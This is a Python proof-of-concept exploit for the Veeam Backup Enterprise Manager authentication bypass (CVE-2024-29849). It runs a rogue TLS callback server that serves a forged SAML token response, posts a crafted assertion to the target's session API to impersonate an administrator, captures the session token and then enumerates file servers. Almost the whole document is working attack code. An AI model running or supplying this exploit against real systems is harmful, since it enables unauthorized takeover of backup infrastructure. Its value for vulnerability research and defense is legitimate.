""" Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849) Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) Technical details: https://summoning.team/blog/veeam-enterprise-manager-CVE-2024-29849-auth-bypass/ """ banner = r""" _______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______ |______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | | ______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | | (*) Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) (*) Technical details: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/ """ """""" from http.server import HTTPServer, SimpleHTTPRequestHandler import ssl import warnings import base64 warnings.filterwarnings("ignore", category=DeprecationWarning) import requests requests.packages.urllib3.disable_warnings() import argparse import ssl from urllib.parse import urlparse import requests import ssl import OpenSSL from cryptography import x509 from cryptography.hazmat.backends import default_backend from urllib.parse import urlparse from threading import Thread import os print(banner) parser = argparse.ArgumentParser(usage=r'python CVE-2024-29849.py --target https://192.168.253.180:9398 --callback-server 192.168.253.1:443') parser.add_argument('--target', '-t', dest='target', help='Target IP and port (e.g: https://192.168.1.1:9398)', required=True) parser.add_argument('--callback-server', '-s', dest='callback_server', help='Callback server for authentication bypass', required=True) parser.add_argument('--domain-name', '-d', dest='domain_name', help='target domain name',default=None, required=False) parser.add_argument('--target-user', '-u', dest='target_user', help='username to impersonate',default='administrator', required=False) args = parser.parse_args() args.target = args.target.rstrip('/') class CustomHandler(SimpleHTTPRequestHandler): def do_POST(self): xml_response = ''' urn:oasis:names:tc:SAML:2.0:assertion http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid ''' self.send_response(200) self.send_header("Content-type", "text/xml") self.end_headers() self.wfile.write(xml_response.encode("utf-8")) print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType") def start_callback_server(ip, port): global server_ready # openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes httpd = HTTPServer((ip, port), CustomHandler) ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) ssl_context.load_cert_chain("server.pem", keyfile="key.pem") httpd.socket = ssl_context.wrap_socket( httpd.socket, server_side=True, ) print(f"(*) Callback server listening on https://{ip}:{port}") server_ready = True httpd.serve_forever() def get_cn_from_cert(target): parsed_url = urlparse(target) hostname = parsed_url.hostname domain_name = None if parsed_url.port == None: parsed_url.port = 443 print(f"(*) Fetching certificate for {hostname}") try: cert = ssl.get_server_certificate((hostname, int(parsed_url.port))) except Exception as e: print(f"(!) Could not fetch certificate: {e}") return None x509_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert) crypto_cert = x509.load_pem_x509_certificate(cert.encode(), default_backend()) cn = None for attribute in crypto_cert.subject: if attribute.oid == x509.NameOID.COMMON_NAME: cn = attribute.value break if cn != None: print(f"(*) Common Name (CN) extracted from certificate: {cn}") domain_name = f"{cn.split(".")[-2]}.{cn.split(".")[-1]}" print(f"(*) Assumed domain name: {domain_name}") answer = input("(?) Is the assumed domain name correct(Y/n)?") if answer.lower() == "y": return domain_name else: domain_name = input("(*) Enter the correct domain name: ") return domain_name def sanity_check_target(target): try: r = s.get(f"{target.rstrip('/')}/api/", verify=False) except Exception as e: print(f"(!) Could not reach the target: {e}") exit(1) if "www.veeam.com/ent/v1.0" not in r.text: print("(!) The target does not seem to be a Veeam Backup Enterprise Manager") exit(1) print(f"(*) Target {target} is reachable and seems to be a Veeam Backup Enterprise Manager") def sanity_files(): if not os.path.exists("server.pem") or not os.path.exists("key.pem"): print("(!) server.pem or key.pem not found, please generate them using the following command:") print("openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes") exit(1) def sanity_check_callback_server(callback_server): while not server_ready: pass counter = 5 while counter: try: r = s.get(f"https://{callback_server}/", verify=False) counter = 0 except Exception as e: print(f"(*) Checking callback server") counter -= 1 if r == None: print(f"(!) Could not reach the callback server {callback_server}") exit(1) print(f"(*) Callback server {callback_server} is reachable") def exploit(target_user): print(f"(*) Triggering malicious SAML assertion to {args.target}") print(f"(*) Impersonating user: {target_user}") try: xml_b64_body = base64.b64encode(f'''https://{args.callback_server}/STSService{target_user}urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport'''.encode('utf-8')).decode('utf-8') r = s.post(f"{args.target.rstrip('/')}/api/sessionMngr/?v=latest", headers={"Content-type":"application/json"}, json={"VMwareSSOToken": xml_b64_body}) except Exception as e: print(f"(!) Could not send the malicious SAML assertion to {args.target}") print(e) exit(1) if(r.status_code != 201): print(f"(!) Exploit failed, result was: {r.text}") print(r) exit(1) if(r.headers['X-Restsvcsessionid'] != None): print(f"\n(+) Exploit was Successful, authenticated as {target_user}") print(f"(*) Got token: {r.headers['X-Restsvcsessionid']}") return r.headers['X-Restsvcsessionid'] def post_exploit(token): print("(*) Starting post-exploitation phase") print("(*) Retrieving the list of file servers") r = s.get(f"{args.target.rstrip('/')}/api/nas/fileServers?format=Entity", verify=False, headers={"Accept":"application/json","Content-Type":"application/json","X-Restsvcsessionid":token}) try: print(r.json()) except: print(r.text) s = requests.Session() s.verify = False server_ready = False sanity_files() sanity_check_target(args.target) if(args.domain_name == None): args.domain_name = get_cn_from_cert(args.target) print(f"(*) Target domain name is: {args.domain_name}") args.target_user = f"{args.target_user}@{args.domain_name}" print("(*) Starting callback server") print("\n(^_^) Prepare for the Pwnage (^_^)\n") callback_server_thread = Thread(target=start_callback_server, args=(args.callback_server.split(":")[0], int(args.callback_server.split(":")[1]),)) callback_server_thread.setDaemon(True) callback_server_thread.start() sanity_check_callback_server(args.callback_server) pwned_token = exploit(args.target_user) post_exploit(pwned_token)